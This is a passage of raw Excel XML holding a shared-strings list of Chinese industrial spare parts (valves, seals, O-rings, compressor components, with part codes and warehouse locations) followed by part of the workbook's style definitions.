    <t>插板阀阀板</t>
  </si>
  <si>
    <t>CF384</t>
  </si>
  <si>
    <t>080816029</t>
  </si>
  <si>
    <t>带油缸</t>
  </si>
  <si>
    <t>座板阀</t>
  </si>
  <si>
    <t>CJ/Z4Ra</t>
  </si>
  <si>
    <t>080816046</t>
  </si>
  <si>
    <t>XZ</t>
  </si>
  <si>
    <t>销轴</t>
  </si>
  <si>
    <t>080817009</t>
  </si>
  <si>
    <t>080818005</t>
  </si>
  <si>
    <t>QMH</t>
  </si>
  <si>
    <t>汽轮机气密环</t>
  </si>
  <si>
    <t>080818006</t>
  </si>
  <si>
    <t>QMHTH</t>
  </si>
  <si>
    <t>气密环弹簧</t>
  </si>
  <si>
    <t>080818010</t>
  </si>
  <si>
    <t>DCL</t>
  </si>
  <si>
    <t>主.被动齿轮</t>
  </si>
  <si>
    <t>XJL-5T/8T</t>
  </si>
  <si>
    <t>080818018</t>
  </si>
  <si>
    <t>LL</t>
  </si>
  <si>
    <t>链轮</t>
  </si>
  <si>
    <t>CJ/TJQ06B</t>
  </si>
  <si>
    <t>080819002</t>
  </si>
  <si>
    <t>ZXLS</t>
  </si>
  <si>
    <t>柱销螺栓</t>
  </si>
  <si>
    <t>080819005</t>
  </si>
  <si>
    <t>OXQ90*3.1</t>
  </si>
  <si>
    <t>70*3.1/50*3.1</t>
  </si>
  <si>
    <t>080819009</t>
  </si>
  <si>
    <t>080819010</t>
  </si>
  <si>
    <t>LZQL47</t>
  </si>
  <si>
    <t>080819011</t>
  </si>
  <si>
    <t>PSQ</t>
  </si>
  <si>
    <t>KTS-P30</t>
  </si>
  <si>
    <t>080819012</t>
  </si>
  <si>
    <t>PTLNSF-1-300</t>
  </si>
  <si>
    <t>喷头</t>
  </si>
  <si>
    <t>080819020</t>
  </si>
  <si>
    <t>080819021</t>
  </si>
  <si>
    <t>DPDML-07</t>
  </si>
  <si>
    <t>叠片</t>
  </si>
  <si>
    <t>DML-07</t>
  </si>
  <si>
    <t>080819022</t>
  </si>
  <si>
    <t>fy</t>
  </si>
  <si>
    <t>叶片</t>
  </si>
  <si>
    <t>080819028</t>
  </si>
  <si>
    <t>主轴</t>
  </si>
  <si>
    <t>BFJ47</t>
  </si>
  <si>
    <t>080819040</t>
  </si>
  <si>
    <t>TDL47-333</t>
  </si>
  <si>
    <t>L47-333</t>
  </si>
  <si>
    <t>080819051</t>
  </si>
  <si>
    <t>SYP</t>
  </si>
  <si>
    <t>甩油盘</t>
  </si>
  <si>
    <t>080819054</t>
  </si>
  <si>
    <t>349DG</t>
  </si>
  <si>
    <t>349顶盖</t>
  </si>
  <si>
    <t>080819059</t>
  </si>
  <si>
    <t>TL5</t>
  </si>
  <si>
    <t>080819061</t>
  </si>
  <si>
    <t>连接盘垫圈</t>
  </si>
  <si>
    <t>LF70</t>
  </si>
  <si>
    <t>080820004</t>
  </si>
  <si>
    <t>080820033</t>
  </si>
  <si>
    <t>GYBG6</t>
  </si>
  <si>
    <t>干油泵</t>
  </si>
  <si>
    <t>G6</t>
  </si>
  <si>
    <t>080921001</t>
  </si>
  <si>
    <t>MFQ2101-04-03/05</t>
  </si>
  <si>
    <t>2101-04-03/05</t>
  </si>
  <si>
    <t>080921004</t>
  </si>
  <si>
    <t>OXQ10-214</t>
  </si>
  <si>
    <t>10-214</t>
  </si>
  <si>
    <t>080921007</t>
  </si>
  <si>
    <t>HDH04-02</t>
  </si>
  <si>
    <t>活动环</t>
  </si>
  <si>
    <t>080921009</t>
  </si>
  <si>
    <t>LGW2101-03-03</t>
  </si>
  <si>
    <t>2101-03-03</t>
  </si>
  <si>
    <t>080921010</t>
  </si>
  <si>
    <t>GDH04-04</t>
  </si>
  <si>
    <t>固定环</t>
  </si>
  <si>
    <t>04-04</t>
  </si>
  <si>
    <t>080921013</t>
  </si>
  <si>
    <t>LG12-13</t>
  </si>
  <si>
    <t>12-13</t>
  </si>
  <si>
    <t>080921018</t>
  </si>
  <si>
    <t>YH</t>
  </si>
  <si>
    <t>油环</t>
  </si>
  <si>
    <t>080921020</t>
  </si>
  <si>
    <t>2105-12-6</t>
  </si>
  <si>
    <t>080921025</t>
  </si>
  <si>
    <t>GT8AS-17</t>
  </si>
  <si>
    <t>8AS-17（2101-13-01）</t>
  </si>
  <si>
    <t>080921026</t>
  </si>
  <si>
    <t>DWT03-06</t>
  </si>
  <si>
    <t>03-06</t>
  </si>
  <si>
    <t>080921027</t>
  </si>
  <si>
    <t>ZDH13-13左</t>
  </si>
  <si>
    <t>转动环</t>
  </si>
  <si>
    <t>13-13左</t>
  </si>
  <si>
    <t>080921031</t>
  </si>
  <si>
    <t>XWQ13-10</t>
  </si>
  <si>
    <t>限位圏</t>
  </si>
  <si>
    <t>13-10</t>
  </si>
  <si>
    <t>080921032</t>
  </si>
  <si>
    <t>080921040</t>
  </si>
  <si>
    <t>YBJX</t>
  </si>
  <si>
    <t>油泵机芯</t>
  </si>
  <si>
    <t>080921041</t>
  </si>
  <si>
    <t>MFQ10-404</t>
  </si>
  <si>
    <t>10-404</t>
  </si>
  <si>
    <t>080921043</t>
  </si>
  <si>
    <t>TL2101-10-507</t>
  </si>
  <si>
    <t>2101-10-507</t>
  </si>
  <si>
    <t>080921044</t>
  </si>
  <si>
    <t>DQ13-2</t>
  </si>
  <si>
    <t>13-2</t>
  </si>
  <si>
    <t>080921045</t>
  </si>
  <si>
    <t>GDY13-7</t>
  </si>
  <si>
    <t>盖导叶</t>
  </si>
  <si>
    <t>13-7</t>
  </si>
  <si>
    <t>080921046</t>
  </si>
  <si>
    <t>WFZ</t>
  </si>
  <si>
    <t>外阀座</t>
  </si>
  <si>
    <t>080921047</t>
  </si>
  <si>
    <t>NFZ13-15</t>
  </si>
  <si>
    <t>内阀座</t>
  </si>
  <si>
    <t>13-15</t>
  </si>
  <si>
    <t>080921050</t>
  </si>
  <si>
    <t>THZ04-1</t>
  </si>
  <si>
    <t>04-1</t>
  </si>
  <si>
    <t>080921055</t>
  </si>
  <si>
    <t>JG13-12</t>
  </si>
  <si>
    <t>假盖</t>
  </si>
  <si>
    <t>13-12</t>
  </si>
  <si>
    <t>080921059</t>
  </si>
  <si>
    <t>GD</t>
  </si>
  <si>
    <t>缸垫</t>
  </si>
  <si>
    <t>080921063</t>
  </si>
  <si>
    <t>YGT</t>
  </si>
  <si>
    <t>油缸套</t>
  </si>
  <si>
    <t>080921065</t>
  </si>
  <si>
    <t>LTH</t>
  </si>
  <si>
    <t>080921066</t>
  </si>
  <si>
    <t>LG508</t>
  </si>
  <si>
    <t>508</t>
  </si>
  <si>
    <t>080921067</t>
  </si>
  <si>
    <t>LG550</t>
  </si>
  <si>
    <t>550</t>
  </si>
  <si>
    <t>080921068</t>
  </si>
  <si>
    <t>LG592</t>
  </si>
  <si>
    <t>592</t>
  </si>
  <si>
    <t>080921069</t>
  </si>
  <si>
    <t>LG634</t>
  </si>
  <si>
    <t>634</t>
  </si>
  <si>
    <t>080921070</t>
  </si>
  <si>
    <t>AQFAG20</t>
  </si>
  <si>
    <t>AG20</t>
  </si>
  <si>
    <t>080921071</t>
  </si>
  <si>
    <t>YLQQ2101-50-00</t>
  </si>
  <si>
    <t>2101-50-00</t>
  </si>
  <si>
    <t>080921072</t>
  </si>
  <si>
    <t>轴瓦（电机）</t>
  </si>
  <si>
    <t>5HZ.263.004.1</t>
  </si>
  <si>
    <t>080921081</t>
  </si>
  <si>
    <t>JXMF 1000/588/489</t>
  </si>
  <si>
    <t>1000/588/489</t>
  </si>
  <si>
    <t>080922002</t>
  </si>
  <si>
    <t>CXV-429G</t>
  </si>
  <si>
    <t>080922003</t>
  </si>
  <si>
    <t>080922007</t>
  </si>
  <si>
    <t>NYJQ95*3.1</t>
  </si>
  <si>
    <t>耐油胶圏</t>
  </si>
  <si>
    <t>95*3.1</t>
  </si>
  <si>
    <t>080922011</t>
  </si>
  <si>
    <t>NYTLD25-03-12</t>
  </si>
  <si>
    <t>耐油填料垫</t>
  </si>
  <si>
    <t>25-03-12</t>
  </si>
  <si>
    <t>080922012</t>
  </si>
  <si>
    <t>MFQΦ31.5  03-102</t>
  </si>
  <si>
    <t>Φ31.5  03-102</t>
  </si>
  <si>
    <t>080922013</t>
  </si>
  <si>
    <t>MFQΦ31.5  03-103</t>
  </si>
  <si>
    <t>Φ31.5  03-103</t>
  </si>
  <si>
    <t>080922014</t>
  </si>
  <si>
    <t>KA31.5</t>
  </si>
  <si>
    <t>080922015</t>
  </si>
  <si>
    <t>油精滤芯</t>
  </si>
  <si>
    <t>YCX-3004B/C</t>
  </si>
  <si>
    <t>080922019</t>
  </si>
  <si>
    <t>JXMFDTM40A</t>
  </si>
  <si>
    <t>DTM40A</t>
  </si>
  <si>
    <t>080922030</t>
  </si>
  <si>
    <t>膜片组</t>
  </si>
  <si>
    <t>080922036</t>
  </si>
  <si>
    <t>BPG</t>
  </si>
  <si>
    <t>薄片盖</t>
  </si>
  <si>
    <t>081023002</t>
  </si>
  <si>
    <t>XDSH2518</t>
  </si>
  <si>
    <t>销钉</t>
  </si>
  <si>
    <t>SH2518</t>
  </si>
  <si>
    <t>081023003</t>
  </si>
  <si>
    <t>ZTLP81460-2</t>
  </si>
  <si>
    <t>主推力盘</t>
  </si>
  <si>
    <t>81460-2</t>
  </si>
  <si>
    <t>081023004</t>
  </si>
  <si>
    <t>FTLP81460-2</t>
  </si>
  <si>
    <t>付推力盘</t>
  </si>
  <si>
    <t>081023005</t>
  </si>
  <si>
    <t>081023006</t>
  </si>
  <si>
    <t>YLKG</t>
  </si>
  <si>
    <t>压力开关</t>
  </si>
  <si>
    <t>081023008</t>
  </si>
  <si>
    <t>YF2027-01-4</t>
  </si>
  <si>
    <t>2027-01-4</t>
  </si>
  <si>
    <t>081023009</t>
  </si>
  <si>
    <t>YF2027-01-1</t>
  </si>
  <si>
    <t>2027-01-1</t>
  </si>
  <si>
    <t>081023010</t>
  </si>
  <si>
    <t>MF2053-01*8</t>
  </si>
  <si>
    <t>密封</t>
  </si>
  <si>
    <t>2053-01*8</t>
  </si>
  <si>
    <t>081023011</t>
  </si>
  <si>
    <t>MF2053-01*9</t>
  </si>
  <si>
    <t>2053-01*9</t>
  </si>
  <si>
    <t>081023012</t>
  </si>
  <si>
    <t>MF2053*01*10</t>
  </si>
  <si>
    <t>2053*01*10</t>
  </si>
  <si>
    <t>081023013</t>
  </si>
  <si>
    <t>MF2053*01*11</t>
  </si>
  <si>
    <t>2053*01*11</t>
  </si>
  <si>
    <t>081023014</t>
  </si>
  <si>
    <t>MF2053*01*12</t>
  </si>
  <si>
    <t>2053*01*12</t>
  </si>
  <si>
    <t>081023016</t>
  </si>
  <si>
    <t>ZTZC81460</t>
  </si>
  <si>
    <t>支推轴衬</t>
  </si>
  <si>
    <t>81460</t>
  </si>
  <si>
    <t>081023017</t>
  </si>
  <si>
    <t>ZC81360</t>
  </si>
  <si>
    <t>轴衬</t>
  </si>
  <si>
    <t>81360</t>
  </si>
  <si>
    <t>081024001</t>
  </si>
  <si>
    <t>HSHΦ180</t>
  </si>
  <si>
    <t>081024002</t>
  </si>
  <si>
    <t>HSHΦ130</t>
  </si>
  <si>
    <t>Φ130</t>
  </si>
  <si>
    <t>081024006</t>
  </si>
  <si>
    <t>081024007</t>
  </si>
  <si>
    <t>OXQ170*1.8</t>
  </si>
  <si>
    <t>170*1.8</t>
  </si>
  <si>
    <t>081024009</t>
  </si>
  <si>
    <t>DQ20Y</t>
  </si>
  <si>
    <t>20Y</t>
  </si>
  <si>
    <t>081024011</t>
  </si>
  <si>
    <t>OXQ81.4*1.8</t>
  </si>
  <si>
    <t>81.4*1.8</t>
  </si>
  <si>
    <t>081024012</t>
  </si>
  <si>
    <t>OXQ11.2*1.8</t>
  </si>
  <si>
    <t>11.2*1.8</t>
  </si>
  <si>
    <t>081024013</t>
  </si>
  <si>
    <t>MFH34-04/31-05</t>
  </si>
  <si>
    <t>34-04/31-05</t>
  </si>
  <si>
    <t>081024015</t>
  </si>
  <si>
    <t>ZLH4L10（1）37-07</t>
  </si>
  <si>
    <t>4L10（1）37-07</t>
  </si>
  <si>
    <t>081024017</t>
  </si>
  <si>
    <t>XTWL1-03-02B</t>
  </si>
  <si>
    <t>小头瓦</t>
  </si>
  <si>
    <t>L1-03-02B</t>
  </si>
  <si>
    <t>081024019</t>
  </si>
  <si>
    <t>M4L10（1）21-01</t>
  </si>
  <si>
    <t>4L10（1）21-01</t>
  </si>
  <si>
    <t>081024020</t>
  </si>
  <si>
    <t>QF42-52</t>
  </si>
  <si>
    <t>气阀</t>
  </si>
  <si>
    <t>42-52</t>
  </si>
  <si>
    <t>081024024</t>
  </si>
  <si>
    <t>GYH4L10（1）37-04/05</t>
  </si>
  <si>
    <t>4L10（1）37-04/05</t>
  </si>
  <si>
    <t>081024025</t>
  </si>
  <si>
    <t>HSGL3.3（D）22-03</t>
  </si>
  <si>
    <t>L3.3（D）22-03</t>
  </si>
  <si>
    <t>081024028</t>
  </si>
  <si>
    <t>LGWL1-03-04</t>
  </si>
  <si>
    <t>L1-03-04</t>
  </si>
  <si>
    <t>081024029</t>
  </si>
  <si>
    <t>DPL1-03-05</t>
  </si>
  <si>
    <t>L1-03-05</t>
  </si>
  <si>
    <t>081024030</t>
  </si>
  <si>
    <t>ZYDGL1-04A-02/04</t>
  </si>
  <si>
    <t>左右端盖</t>
  </si>
  <si>
    <t>L1-04A-02/04</t>
  </si>
  <si>
    <t>081024032</t>
  </si>
  <si>
    <t>ZCZL1-02-04A</t>
  </si>
  <si>
    <t>L1-02-04A</t>
  </si>
  <si>
    <t>081024033</t>
  </si>
  <si>
    <t>08110008</t>
  </si>
  <si>
    <t>筛网板</t>
  </si>
  <si>
    <t>310S</t>
  </si>
  <si>
    <t>08120003</t>
  </si>
  <si>
    <t>三段气阀</t>
  </si>
  <si>
    <t>6m50J-43/53-00</t>
  </si>
  <si>
    <t>08120004</t>
  </si>
  <si>
    <t>四段气阀</t>
  </si>
  <si>
    <t>6M50J-44/54-00</t>
  </si>
  <si>
    <t>08120005</t>
  </si>
  <si>
    <t>五段气阀</t>
  </si>
  <si>
    <t>6M50J-45/55-00</t>
  </si>
  <si>
    <t>08120006</t>
  </si>
  <si>
    <t>六段气阀</t>
  </si>
  <si>
    <t>6M50J-46/56-00</t>
  </si>
  <si>
    <t>08120007</t>
  </si>
  <si>
    <t>6M50J-FWⅡ</t>
  </si>
  <si>
    <t>08120008</t>
  </si>
  <si>
    <t>6M50J-41/22/43/44-03</t>
  </si>
  <si>
    <t>08120009</t>
  </si>
  <si>
    <t>ＦＷＴＨ</t>
  </si>
  <si>
    <t>08120010</t>
  </si>
  <si>
    <t>6M50J-FHⅡ</t>
  </si>
  <si>
    <t>08120011</t>
  </si>
  <si>
    <t>HCP</t>
  </si>
  <si>
    <t>缓冲片</t>
  </si>
  <si>
    <t>4M12-41-04A</t>
  </si>
  <si>
    <t>08120013</t>
  </si>
  <si>
    <t>弹簧（活门用）</t>
  </si>
  <si>
    <t>HTB</t>
  </si>
  <si>
    <t>08120018</t>
  </si>
  <si>
    <t>85*3.1</t>
  </si>
  <si>
    <t>08120019</t>
  </si>
  <si>
    <t>125*3.1</t>
  </si>
  <si>
    <t>08120021</t>
  </si>
  <si>
    <t>O型圏</t>
  </si>
  <si>
    <t>360*8.6</t>
  </si>
  <si>
    <t>08120022</t>
  </si>
  <si>
    <t>08120023</t>
  </si>
  <si>
    <t>240*8.6</t>
  </si>
  <si>
    <t>08120024</t>
  </si>
  <si>
    <t>聚四氟乙烯垫</t>
  </si>
  <si>
    <t>240*228*2.5</t>
  </si>
  <si>
    <t>08120025</t>
  </si>
  <si>
    <t>188*3.5</t>
  </si>
  <si>
    <t>08120031</t>
  </si>
  <si>
    <t>6M50A-11-4/13</t>
  </si>
  <si>
    <t>08120032</t>
  </si>
  <si>
    <t>6M50J-12-3/9</t>
  </si>
  <si>
    <t>08120033</t>
  </si>
  <si>
    <t>6M50A-13-5/10</t>
  </si>
  <si>
    <t>08120034</t>
  </si>
  <si>
    <t>6M50A-14-5/7</t>
  </si>
  <si>
    <t>08120035</t>
  </si>
  <si>
    <t>6M50J-15-4/8</t>
  </si>
  <si>
    <t>08120036</t>
  </si>
  <si>
    <t>6M50A-16-8/2</t>
  </si>
  <si>
    <t>08120040</t>
  </si>
  <si>
    <t>6M50G-18-1</t>
  </si>
  <si>
    <t>08120041</t>
  </si>
  <si>
    <t>6M50G-19-2</t>
  </si>
  <si>
    <t>08120042</t>
  </si>
  <si>
    <t>6M50G-20-2</t>
  </si>
  <si>
    <t>08120043</t>
  </si>
  <si>
    <t>6M50G-21-2</t>
  </si>
  <si>
    <t>08120044</t>
  </si>
  <si>
    <t>6M50G-22-2</t>
  </si>
  <si>
    <t>08120045</t>
  </si>
  <si>
    <t>6m50j-5-1</t>
  </si>
  <si>
    <t>08120048</t>
  </si>
  <si>
    <t>6M50-5-2</t>
  </si>
  <si>
    <t>08120049</t>
  </si>
  <si>
    <t>6M50-5-4</t>
  </si>
  <si>
    <t>08120050</t>
  </si>
  <si>
    <t>GJT</t>
  </si>
  <si>
    <t>6M50-28A-00</t>
  </si>
  <si>
    <t>08120051</t>
  </si>
  <si>
    <t>垫圏</t>
  </si>
  <si>
    <t>6M50-5-5</t>
  </si>
  <si>
    <t>08120052</t>
  </si>
  <si>
    <t>CL</t>
  </si>
  <si>
    <t>6M50-3-8</t>
  </si>
  <si>
    <t>08120053</t>
  </si>
  <si>
    <t>6M50-3-5</t>
  </si>
  <si>
    <t>08120054</t>
  </si>
  <si>
    <t>6M50M-29-3</t>
  </si>
  <si>
    <t>08120055</t>
  </si>
  <si>
    <t>6M50M-27-06-00</t>
  </si>
  <si>
    <t>08120056</t>
  </si>
  <si>
    <t>6M50M-27-07-00</t>
  </si>
  <si>
    <t>08120057</t>
  </si>
  <si>
    <t>6M50M-27-08-00</t>
  </si>
  <si>
    <t>08120058</t>
  </si>
  <si>
    <t>终端锥管接头</t>
  </si>
  <si>
    <t>29A-5/1φ14</t>
  </si>
  <si>
    <t>08120059</t>
  </si>
  <si>
    <t>29A-4</t>
  </si>
  <si>
    <t>08120065</t>
  </si>
  <si>
    <t>6M50C五段</t>
  </si>
  <si>
    <t>08120066</t>
  </si>
  <si>
    <t>TLFL</t>
  </si>
  <si>
    <t>填料法兰</t>
  </si>
  <si>
    <t>08120067</t>
  </si>
  <si>
    <t>6M50C六段</t>
  </si>
  <si>
    <t>08120068</t>
  </si>
  <si>
    <t>6M50C</t>
  </si>
  <si>
    <t>08120069</t>
  </si>
  <si>
    <t>ZCH</t>
  </si>
  <si>
    <t>6M50A-17-5/6</t>
  </si>
  <si>
    <t>08120071</t>
  </si>
  <si>
    <t>6M50J-22-3</t>
  </si>
  <si>
    <t>08120073</t>
  </si>
  <si>
    <t>三级活塞体</t>
  </si>
  <si>
    <t>6M50J-19-3</t>
  </si>
  <si>
    <t>08120074</t>
  </si>
  <si>
    <t>四级活塞体</t>
  </si>
  <si>
    <t>6M50J-20-3</t>
  </si>
  <si>
    <t>08120075</t>
  </si>
  <si>
    <t>6M50-22-01</t>
  </si>
  <si>
    <t>08120076</t>
  </si>
  <si>
    <t>6M50-17-01</t>
  </si>
  <si>
    <t>08120081</t>
  </si>
  <si>
    <t>45*250</t>
  </si>
  <si>
    <t>08120082</t>
  </si>
  <si>
    <t>垫块A</t>
  </si>
  <si>
    <t>17-01/19-01</t>
  </si>
  <si>
    <t>08120083</t>
  </si>
  <si>
    <t>垫块B</t>
  </si>
  <si>
    <t>17-04/19-04</t>
  </si>
  <si>
    <t>09002</t>
  </si>
  <si>
    <t>09004</t>
  </si>
  <si>
    <t>BZD</t>
  </si>
  <si>
    <t>编织袋</t>
  </si>
  <si>
    <t>09008</t>
  </si>
  <si>
    <t>RKXJD</t>
  </si>
  <si>
    <t>人孔橡胶垫</t>
  </si>
  <si>
    <t>1号库</t>
  </si>
  <si>
    <t>转子（搅拌轴）</t>
  </si>
  <si>
    <t>3号库</t>
  </si>
  <si>
    <t>1.5寸</t>
  </si>
  <si>
    <t>4号库</t>
  </si>
  <si>
    <t>25kg</t>
  </si>
  <si>
    <t>6号库</t>
  </si>
  <si>
    <t>铝排</t>
  </si>
  <si>
    <t>2号库</t>
  </si>
  <si>
    <t>公斤称</t>
  </si>
  <si>
    <t>50型</t>
  </si>
  <si>
    <t>库棚外</t>
  </si>
  <si>
    <t>挡渣器</t>
  </si>
  <si>
    <t>氰尿酸</t>
  </si>
  <si>
    <t>油泵泵头</t>
  </si>
  <si>
    <t>DN50不锈钢芯</t>
  </si>
  <si>
    <t>离心机筛网</t>
  </si>
  <si>
    <t>各型号</t>
  </si>
  <si>
    <t>电机控制器</t>
  </si>
  <si>
    <t>JDIA-40</t>
  </si>
  <si>
    <t>合计</t>
  </si>
</sst>
</file>

<file path=xl/styles.xml><?xml version="1.0" encoding="utf-8"?>
<styleSheet xmlns="http://schemas.openxmlformats.org/spreadsheetml/2006/main">
  <numFmts count="10">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00_ "/>
    <numFmt numFmtId="177" formatCode="#,##0.00_);[Red]\(#,##0.00\)"/>
    <numFmt numFmtId="178" formatCode="#,##0.00_ "/>
    <numFmt numFmtId="179" formatCode="0_);[Red]\(0\)"/>
    <numFmt numFmtId="180" formatCode="#,##0_ "/>
    <numFmt numFmtId="181" formatCode="#,##0_);[Red]\(#,##0\)"/>
  </numFmts>
  <fonts count="31">
    <font>
      <sz val="12"/>
      <name val="宋体"/>
      <charset val="134"/>
    </font>
    <font>
      <sz val="18"/>
      <name val="宋体"/>
      <charset val="134"/>
    </font>
    <font>
      <sz val="14"/>
      <name val="宋体"/>
      <charset val="134"/>
    </font>
    <font>
      <sz val="10"/>
      <name val="宋体"/>
      <charset val="134"/>
    </font>
    <font>
      <sz val="9"/>
      <name val="宋体"/>
      <charset val="134"/>
    </font>
    <font>
      <b/>
      <sz val="9"/>
      <name val="宋体"/>
      <charset val="134"/>
    </font>
    <font>
      <b/>
      <sz val="12"/>
      <name val="宋体"/>
      <charset val="134"/>
    </font>
    <font>
      <b/>
      <sz val="10"/>
      <name val="宋体"/>
      <charset val="134"/>
    </font>
    <font>
      <sz val="10"/>
      <color theme="1"/>
      <name val="宋体"/>
      <charset val="134"/>
    </font>
    <font>
      <sz val="10"/>
      <name val="Arial"/>
      <family val="2"/>
      <charset val="0"/>
    </font>
    <font>
      <sz val="12"/>
      <name val="Times New Roman"/>
      <family val="1"/>
      <charset val="0"/>
    </font>
    <font>
      <sz val="11"/>
      <color indexed="9"/>
      <name val="宋体"/>
      <charset val="134"/>
    </font>
    <font>
      <sz val="11"/>
      <color indexed="8"/>
      <name val="宋体"/>
      <charset val="134"/>
    </font>
    <font>
      <sz val="11"/>
      <color indexed="53"/>
      <name val="宋体"/>
      <charset val="134"/>
    </font>
    <font>
      <b/>
      <sz val="15"/>
      <color indexed="54"/>
      <name val="宋体"/>
      <charset val="134"/>
    </font>
    <font>
      <sz val="11"/>
      <color indexed="10"/>
      <name val="宋体"/>
      <charset val="134"/>
    </font>
    <font>
      <b/>
      <sz val="13"/>
      <color indexed="54"/>
      <name val="宋体"/>
      <charset val="134"/>
    </font>
    <font>
      <sz val="11"/>
      <color indexed="16"/>
      <name val="宋体"/>
      <charset val="134"/>
    </font>
    <font>
      <sz val="11"/>
      <color indexed="17"/>
      <name val="宋体"/>
      <charset val="134"/>
    </font>
    <font>
      <u/>
      <sz val="12"/>
      <color indexed="12"/>
      <name val="宋体"/>
      <charset val="134"/>
    </font>
    <font>
      <b/>
      <sz val="11"/>
      <color indexed="8"/>
      <name val="宋体"/>
      <charset val="134"/>
    </font>
    <font>
      <b/>
      <sz val="11"/>
      <color indexed="53"/>
      <name val="宋体"/>
      <charset val="134"/>
    </font>
    <font>
      <b/>
      <sz val="11"/>
      <color indexed="54"/>
      <name val="宋体"/>
      <charset val="134"/>
    </font>
    <font>
      <i/>
      <sz val="11"/>
      <color indexed="23"/>
      <name val="宋体"/>
      <charset val="134"/>
    </font>
    <font>
      <u/>
      <sz val="12"/>
      <color indexed="36"/>
      <name val="宋体"/>
      <charset val="134"/>
    </font>
    <font>
      <sz val="11"/>
      <color indexed="62"/>
      <name val="宋体"/>
      <charset val="134"/>
    </font>
    <font>
      <b/>
      <sz val="11"/>
      <color indexed="63"/>
      <name val="宋体"/>
      <charset val="134"/>
    </font>
    <font>
      <b/>
      <sz val="11"/>
      <color indexed="9"/>
      <name val="宋体"/>
      <charset val="134"/>
    </font>
    <font>
      <b/>
      <sz val="18"/>
      <color indexed="54"/>
      <name val="宋体"/>
      <charset val="134"/>
    </font>
    <font>
      <sz val="11"/>
      <color indexed="19"/>
      <name val="宋体"/>
      <charset val="134"/>
    </font>
    <font>
      <vertAlign val="superscript"/>
      <sz val="9"/>
      <name val="宋体"/>
      <charset val="134"/>
    </font>
  </fonts>
  <fills count="23">
    <fill>
      <patternFill patternType="none"/>
    </fill>
    <fill>
      <patternFill patternType="gray125"/>
    </fill>
    <fill>
      <patternFill patternType="solid">
        <fgColor rgb="FF92D050"/>
        <bgColor indexed="64"/>
      </patternFill>
    </fill>
    <fill>
      <patternFill patternType="solid">
        <fgColor indexed="10"/>
        <bgColor indexed="64"/>
      </patternFill>
    </fill>
    <fill>
      <patternFill patternType="solid">
        <fgColor indexed="13"/>
        <bgColor indexed="64"/>
      </patternFill>
    </fill>
    <fill>
      <patternFill patternType="solid">
        <fgColor rgb="FFFFFF00"/>
        <bgColor indexed="64"/>
      </patternFill>
    </fill>
    <fill>
      <patternFill patternType="solid">
        <fgColor indexed="53"/>
        <bgColor indexed="64"/>
      </patternFill>
    </fill>
    <fill>
      <patternFill patternType="solid">
        <fgColor indexed="57"/>
        <bgColor indexed="64"/>
      </patternFill>
    </fill>
    <fill>
      <patternFill patternType="solid">
        <fgColor indexed="31"/>
        <bgColor indexed="64"/>
      </patternFill>
    </fill>
    <fill>
      <patternFill patternType="solid">
        <fgColor indexed="22"/>
        <bgColor indexed="64"/>
      </patternFill>
    </fill>
    <fill>
      <patternFill patternType="solid">
        <fgColor indexed="9"/>
        <bgColor indexed="64"/>
      </patternFill>
    </fill>
    <fill>
      <patternFill patternType="solid">
        <fgColor indexed="45"/>
        <bgColor indexed="64"/>
      </patternFill>
    </fill>
    <fill>
      <patternFill patternType="solid">
        <fgColor indexed="42"/>
        <bgColor indexed="64"/>
      </patternFill>
    </fill>
    <fill>
      <patternFill patternType="solid">
        <fgColor indexed="55"/>
        <bgColor indexed="64"/>
      </patternFill>
    </fill>
    <fill>
      <patternFill patternType="solid">
        <fgColor indexed="27"/>
        <bgColor indexed="64"/>
      </patternFill>
    </fill>
    <fill>
      <patternFill patternType="solid">
        <fgColor indexed="48"/>
        <bgColor indexed="64"/>
      </patternFill>
    </fill>
    <fill>
      <patternFill patternType="solid">
        <fgColor indexed="24"/>
        <bgColor indexed="64"/>
      </patternFill>
    </fill>
    <fill>
      <patternFill patternType="solid">
        <fgColor indexed="47"/>
        <bgColor indexed="64"/>
      </patternFill>
    </fill>
    <fill>
      <patternFill patternType="solid">
        <fgColor indexed="51"/>
        <bgColor indexed="64"/>
      </patternFill>
    </fill>
    <fill>
      <patternFill patternType="solid">
        <fgColor indexed="54"/>
        <bgColor indexed="64"/>
      </patternFill>
    </fill>
    <fill>
      <patternFill patternType="solid">
        <fgColor indexed="43"/>
        <bgColor indexed="64"/>
      </patternFill>
    </fill>
    <fill>
      <patternFill patternType="solid">
        <fgColor indexed="44"/>
        <bgColor indexed="64"/>
      </patternFill>
    </fill>
    <fill>
      <patternFill patternType="solid">
        <fgColor indexed="26"/>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double">
        <color indexed="52"/>
      </bottom>
      <diagonal/>
    </border>
    <border>
      <left/>
      <right/>
      <top/>
      <bottom style="medium">
        <color indexed="48"/>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right/>
      <top/>
      <bottom style="medium">
        <color indexed="44"/>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s>
  <cellStyleXfs count="53">
    <xf numFmtId="0" fontId="0" fillId="0" borderId="0"/>
    <xf numFmtId="42" fontId="0" fillId="0" borderId="0" applyFont="0" applyFill="0" applyBorder="0" applyAlignment="0" applyProtection="0"/>
    <xf numFmtId="0" fontId="12" fillId="10" borderId="0" applyNumberFormat="0" applyBorder="0" applyAlignment="0" applyProtection="0">
      <alignment vertical="center"/>
    </xf>
    <xf numFmtId="0" fontId="25" fillId="17" borderId="15" applyNumberFormat="0" applyAlignment="0" applyProtection="0">
      <alignment vertical="center"/>
    </xf>
    <xf numFmtId="44" fontId="0" fillId="0" borderId="0" applyFont="0" applyFill="0" applyBorder="0" applyAlignment="0" applyProtection="0"/>
    <xf numFmtId="41" fontId="0" fillId="0" borderId="0" applyFont="0" applyFill="0" applyBorder="0" applyAlignment="0" applyProtection="0"/>
    <xf numFmtId="0" fontId="12" fillId="9" borderId="0" applyNumberFormat="0" applyBorder="0" applyAlignment="0" applyProtection="0">
      <alignment vertical="center"/>
    </xf>
    <xf numFmtId="0" fontId="17" fillId="11" borderId="0" applyNumberFormat="0" applyBorder="0" applyAlignment="0" applyProtection="0">
      <alignment vertical="center"/>
    </xf>
    <xf numFmtId="43" fontId="0" fillId="0" borderId="0" applyFont="0" applyFill="0" applyBorder="0" applyAlignment="0" applyProtection="0"/>
    <xf numFmtId="0" fontId="11" fillId="9" borderId="0" applyNumberFormat="0" applyBorder="0" applyAlignment="0" applyProtection="0">
      <alignment vertical="center"/>
    </xf>
    <xf numFmtId="0" fontId="19" fillId="0" borderId="0" applyNumberFormat="0" applyFill="0" applyBorder="0" applyAlignment="0" applyProtection="0">
      <alignment vertical="top"/>
      <protection locked="0"/>
    </xf>
    <xf numFmtId="9" fontId="0" fillId="0" borderId="0" applyFont="0" applyFill="0" applyBorder="0" applyAlignment="0" applyProtection="0"/>
